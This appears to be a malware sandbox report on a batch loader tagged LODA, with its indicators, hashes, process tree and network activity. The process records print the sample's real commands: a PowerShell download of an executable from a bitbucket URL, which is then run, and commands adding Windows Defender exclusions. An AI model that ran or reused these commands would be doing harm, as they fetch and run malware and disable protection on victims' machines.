File name: loader3 - Copy.bat

Full analysis: https://app.any.run/tasks/83d1413d-f9dc-4c49-85d7-d9c87f1895bc
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 22, 2024, 20:45:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: loda, loader
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text
MD5: 1999B1AAFB1DC1BB2645CA85EFDBDE1E
SHA1: 1639007816EA76843B72C4BB64DB0BE49694886B
SHA256: 573DA0CBFC357AD652402D12A0AFD1F90DDC6944B9B911A5A79144B189C95387
SSDEEP: 6:ho++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:+EsuUUEVr+ZiRsBEsuEJUtjN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Adds path to the Windows Defender exclusion list
      • cmd.exe (PID: 6260)
    • Script downloads file (POWERSHELL)
      • powershell.exe (PID: 7152)
    • Adds process to the Windows Defender exclusion list
      • cmd.exe (PID: 6260)
    • LODA has been detected (SURICATA)
      • AHPOBS.exe (PID: 936)
    • Connects to the CnC server
      • AHPOBS.exe (PID: 936)
  • SUSPICIOUS
    • Starts POWERSHELL.EXE for command execution
      • cmd.exe (PID: 6260)
    • Probably downloads files using WebClient
      • cmd.exe (PID: 6260)
    • The process bypasses the loading of PowerShell profile settings
      • cmd.exe (PID: 6260)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 7152)
      • AHPOBS.exe (PID: 936)
    • Script adds exclusion path to Windows Defender
      • cmd.exe (PID: 6260)
    • Script adds exclusion process to Windows Defender
      • cmd.exe (PID: 6260)
    • Application launched itself
      • cmd.exe (PID: 6260)
    • Starts CMD.EXE for command execution
      • cmd.exe (PID: 6260)
    • The executable file from the user directory is run by the CMD process
      • AHPOBS.exe (PID: 936)
    • The process creates files with names similar to system file names
      • AHPOBS.exe (PID: 936)
    • Contacting a server suspected of hosting a CnC
      • AHPOBS.exe (PID: 936)
    • Connects to an unusual port
      • AHPOBS.exe (PID: 936)
  • INFO
    • Script raised an exception (POWERSHELL)
      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 5092)
    • Disables trace logs
      • powershell.exe (PID: 7152)
    • Checks proxy server information
      • powershell.exe (PID: 7152)
    • Checks if a key exists in the options dictionary (POWERSHELL)
      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 5092)
    • The sample was compiled with English language support
      • powershell.exe (PID: 7152)
      • AHPOBS.exe (PID: 936)
    • Reads mouse settings
      • AHPOBS.exe (PID: 936)
    • Checks supported languages
      • AHPOBS.exe (PID: 936)
    • Reads the computer name
      • AHPOBS.exe (PID: 936)
    • Creates files or folders in the user directory
      • AHPOBS.exe (PID: 936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 141
Monitored processes: 7
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Processes shown in the graph (figure not reproduced): start, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe, powershell.exe (no specs), cmd.exe (no specs), ahpobs.exe (#LODA).

Process information

PID 936
CMD: C:\Users\admin\AppData\Local\Temp\AHPOBS.exe
Path: C:\Users\admin\AppData\Local\Temp\AHPOBS.exe
Parent process: cmd.exe
User: admin
Integrity Level: MEDIUM
Version: 3, 3, 8, 1
Modules (images):
c:\users\admin\appdata\local\temp\ahpobs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll

PID 3736
CMD: cmd.exe /c C:\Users\admin\AppData\Local\Temp\AHPOBS.exe
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

PID 5092
CMD: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\admin\AppData\Local\Temp\AHPOBS.exe"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 6260
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\loader3 - Copy.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll

PID 6268
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 6340
CMD: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\admin\AppData\Local\Temp"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 7152
CMD: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\admin\AppData\Local\Temp\AHPOBS.exe')"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events: 16 286
Read events: 16 286
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 1
Text files: 6
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6340 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jc2nkgix.5rc.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u00vm12s.0po.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_izvd3xmb.ska.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lgt0ggrb.pn3.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ksw0rs.a3e.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: 96671893A95FF9A808E4CE5CE66642E9
  SHA256: D1793F268D4B4EFCF9F641C99E4484F25C448765E5D1569A54F3B17326031CCD
7152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\AHPOBS.exe | executable
  MD5: A9C526F3A276012D554AC382A90BCA3D
  SHA256: 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
7152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_psd5ohrq.ru5.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
936 | AHPOBS.exe | C:\Users\admin\AppData\Roaming\Windata\svhost.exe | executable
  MD5: A9C526F3A276012D554AC382A90BCA3D
  SHA256: 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 36
DNS requests: 20
Threats: 6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
- | - | GET | 200 | 23.48.23.167:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
- | - | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6472 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
5028 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
5028 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 192.168.100.255:137 | - | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 23.48.23.167:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
- | - | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 104.126.37.144:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
- | - | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1176 | svchost.exe | 40.126.32.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.104.136.2, 4.231.128.59, 40.127.240.158 | whitelisted
google.com | 142.250.184.238 | whitelisted
crl.microsoft.com | 23.48.23.167, 23.48.23.169, 23.48.23.164 | whitelisted
www.microsoft.com | 184.30.21.171 | whitelisted
www.bing.com | 104.126.37.144, 104.126.37.160, 104.126.37.177, 104.126.37.162, 104.126.37.129, 104.126.37.128, 104.126.37.153, 104.126.37.136 | whitelisted
ocsp.digicert.com | 192.229.221.95 | whitelisted
login.live.com | 40.126.32.68, 20.190.160.20, 40.126.32.76, 40.126.32.72, 40.126.32.74, 20.190.160.22, 40.126.32.134, 40.126.32.136 | whitelisted
go.microsoft.com | 23.35.238.131 | whitelisted
bitbucket.org | 185.166.143.49, 185.166.143.48, 185.166.143.50 | shared
bbuseruploads.s3.amazonaws.com | 54.231.128.81, 3.5.25.114, 16.15.176.168, 54.231.195.209, 3.5.30.235, 52.216.38.97, 54.231.133.169, 3.5.30.234 | shared

Threats

Found threats are available for the paid subscriptions.
6 ETPRO signatures available at the full report.
No debug info.